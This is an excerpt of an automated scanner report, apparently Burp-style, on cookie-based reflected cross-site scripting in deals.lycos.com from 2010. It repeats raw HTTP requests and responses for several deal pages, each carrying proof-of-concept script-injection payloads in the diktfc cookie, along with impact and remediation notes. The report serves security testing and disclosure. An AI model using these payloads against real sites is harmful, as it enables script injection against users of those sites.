Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e"%3balert(1)//72d8244a306; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17083
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e2d"><script>alert(1)</script>71fb8bc76fa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39673"%3balert(1)//133a711edd1 was submitted in the diktfc cookie. This input was echoed as 39673";alert(1)//133a711edd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673"%3balert(1)//133a711edd1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17050
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63277"><script>alert(1)</script>b757cca267c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01b2"%3balert(1)//174a20976d8 was submitted in the diktfc cookie. This input was echoed as a01b2";alert(1)//174a20976d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2"%3balert(1)//174a20976d8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee78"><script>alert(1)</script>a4a1fb5c58d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c66"%3balert(1)//b6a939bc91 was submitted in the diktfc cookie. This input was echoed as 45c66";alert(1)//b6a939bc91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66"%3balert(1)//b6a939bc91; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17436
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ae2"><script>alert(1)</script>ecb316bab89 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55068"%3balert(1)//77d4c7afd2 was submitted in the diktfc cookie. This input was echoed as 55068";alert(1)//77d4c7afd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068"%3balert(1)//77d4c7afd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18733
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb5"%3balert(1)//cc77090642d was submitted in the diktfc cookie. This input was echoed as a4fb5";alert(1)//cc77090642d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5"%3balert(1)//cc77090642d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18823
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18fe"><script>alert(1)</script>50f5a41c6f0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:09 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf6"%3balert(1)//17d3e5f2582 was submitted in the diktfc cookie. This input was echoed as 34cf6";alert(1)//17d3e5f2582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6"%3balert(1)//17d3e5f2582; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18825
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57098"><script>alert(1)</script>17fbef7573c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec67"><script>alert(1)</script>28b95ad8bc4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17750
